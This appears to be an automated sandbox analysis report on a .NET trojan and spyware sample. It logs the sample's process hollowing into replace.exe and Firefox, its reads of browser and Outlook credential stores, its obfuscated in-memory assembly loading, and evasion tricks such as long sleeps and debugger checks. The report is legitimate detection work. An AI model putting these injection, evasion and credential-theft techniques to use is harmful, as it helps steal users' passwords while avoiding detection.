                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.AddAccessRule
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, gfiBMJyWKejJe42fYy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.cs Security API names: _0020.AddAccessRule
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, gfiBMJyWKejJe42fYy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, gfiBMJyWKejJe42fYy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@19/10
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MR-239-1599-A.scr.exe.log
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Mutant created: NULL
                  Source: C:\Windows\SysWOW64\replace.exe File created: C:\Users\user\AppData\Local\Temp\C3vB7APK
                  Source: MR-239-1599-A.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: MR-239-1599-A.scr.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: replace.exe, 00000006.00000003.2154596324.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4091676054.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: MR-239-1599-A.scr.exe ReversingLabs: Detection: 50%
                  Source: unknown Process created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                  Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: version.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: riched20.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: usp10.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: msls31.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Section loaded: windowscodecs.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: ieframe.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: mlang.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: winsqlite3.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: vaultcli.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Section loaded: cryptbase.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: wininet.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: mswsock.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: fwpuclnt.dll
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\replace.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: MR-239-1599-A.scr.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: MR-239-1599-A.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: MR-239-1599-A.scr.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: replace.pdb source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: replace.pdbGCTL source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092277586.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033012874.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MR-239-1599-A.scr.exe, MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PIqH.pdb source: MR-239-1599-A.scr.exe
                  Source: Binary string: PIqH.pdbSHA256\;<D source: MR-239-1599-A.scr.exe

                  Data Obfuscation

                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.cs, .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, XG.cs, .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: MR-239-1599-A.scr.exe, Form1.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: MR-239-1599-A.scr.exe, Form1.cs, .Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.cs, .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.cs, .Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.cs, .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.cs, .Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.cs, .Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.replace.exe.3a0cd08.2.raw.unpack, Form1.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 6.2.replace.exe.3a0cd08.2.raw.unpack, Form1.cs, .Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 9.0.DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe.285cd08.1.raw.unpack, Form1.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.0.DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe.285cd08.1.raw.unpack, Form1.cs, .Net Code: InitializeComponent contains xor as well as GetObject
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 0_2_078636D9 push ebx; iretd 0_2_078636DA
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00416023 push ds; ret 3_2_00416071
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00404834 push ebx; ret 3_2_00404835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_0040A036 push es; ret 3_2_0040A039
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_004119A0 pushfd ; iretd 3_2_004119B2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00409A42 push ecx; ret 3_2_00409A46
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_0040D276 push ebx; retf 3_2_0040D29A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_0040D214 push ecx; iretd 3_2_0040D215
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00418B17 push ss; retf 3_2_00418B1B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_004074E7 pushad ; iretd 3_2_004074F3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00403490 push eax; ret 3_2_00403492
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00409D5A push cs; retf 3_2_00409D5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_00406524 push es; iretd 3_2_00406530
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_004145D8 pushfd ; ret 3_2_004145D9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_0040CE54 push cs; iretd 3_2_0040CE5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_014C225F pushad ; ret 3_2_014C27F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_014C27FA pushad ; ret 3_2_014C27F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_014F09AD push ecx; mov dword ptr [esp], ecx 3_2_014F09B6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Code function: 3_2_014C283D push eax; iretd 3_2_014C2858
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_033E225F pushad ; ret 6_2_033E27F9
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_033E27FA pushad ; ret 6_2_033E27F9
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_034109AD push ecx; mov dword ptr [esp], ecx 6_2_034109B6
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_033E283D push eax; iretd 6_2_033E2858
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_033E135E push eax; iretd 6_2_033E1369
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C1231D push edi; retf 6_2_02C12328
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C04054 pushad ; iretd 6_2_02C04060
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C065AF push ecx; ret 6_2_02C065B3
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C0E50D pushfd ; iretd 6_2_02C0E51F
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C1ABE0 push ebx; ret 6_2_02C1ABE1
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C12B90 push ds; ret 6_2_02C12BDE
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C06BA3 push es; ret 6_2_02C06BA6
                  Source: MR-239-1599-A.scr.exe, Static PE information: section name: .text entropy: 7.975940518665788
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: MR-239-1599-A.scr.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 2B00000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 2D40000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 2B70000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 7BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 8BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 8D90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: 9D90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Code function: 3_2_0153096E rdtsc 3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 9828
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe API coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\replace.exe API coverage: 2.6 %
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe TID: 7420 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060 Thread sleep count: 145 > 30
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060 Thread sleep time: -290000s >= -30000s
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060 Thread sleep count: 9828 > 30
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060 Thread sleep time: -19656000s >= -30000s
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088 Thread sleep time: -85000s >= -30000s
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088 Thread sleep count: 42 > 30
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088 Thread sleep time: -42000s >= -30000s
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088 Thread sleep time: -40500s >= -30000s
                  Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\replace.exe Code function: 6_2_02C1BC00 FindFirstFileW,FindNextFileW,FindClose, 6_2_02C1BC00
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4092704521.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2263980776.000002A0FEA6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Code function: 3_2_00417673 LdrLoadDll, 3_2_00417673
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Code function: 3_2_01588158 mov eax, dword ptr fs:[00000030h] 3_2_01588158
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E823B mov eax, dword ptr fs:[00000030h]3_2_014E823B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA2C3 mov eax, dword ptr fs:[00000030h]3_2_014FA2C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA2C3 mov eax, dword ptr fs:[00000030h]3_2_014FA2C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA2C3 mov eax, dword ptr fs:[00000030h]3_2_014FA2C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA2C3 mov eax, dword ptr fs:[00000030h]3_2_014FA2C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA2C3 mov eax, dword ptr fs:[00000030h]3_2_014FA2C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015002E1 mov eax, dword ptr fs:[00000030h]3_2_015002E1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015002E1 mov eax, dword ptr fs:[00000030h]3_2_015002E1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015002E1 mov eax, dword ptr fs:[00000030h]3_2_015002E1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01570283 mov eax, dword ptr fs:[00000030h]3_2_01570283
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01570283 mov eax, dword ptr fs:[00000030h]3_2_01570283
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01570283 mov eax, dword ptr fs:[00000030h]3_2_01570283
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E284 mov eax, dword ptr fs:[00000030h]3_2_0152E284
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E284 mov eax, dword ptr fs:[00000030h]3_2_0152E284
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015002A0 mov eax, dword ptr fs:[00000030h]3_2_015002A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015002A0 mov eax, dword ptr fs:[00000030h]3_2_015002A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov eax, dword ptr fs:[00000030h]3_2_015862A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov ecx, dword ptr fs:[00000030h]3_2_015862A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov eax, dword ptr fs:[00000030h]3_2_015862A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov eax, dword ptr fs:[00000030h]3_2_015862A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov eax, dword ptr fs:[00000030h]3_2_015862A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015862A0 mov eax, dword ptr fs:[00000030h]3_2_015862A0
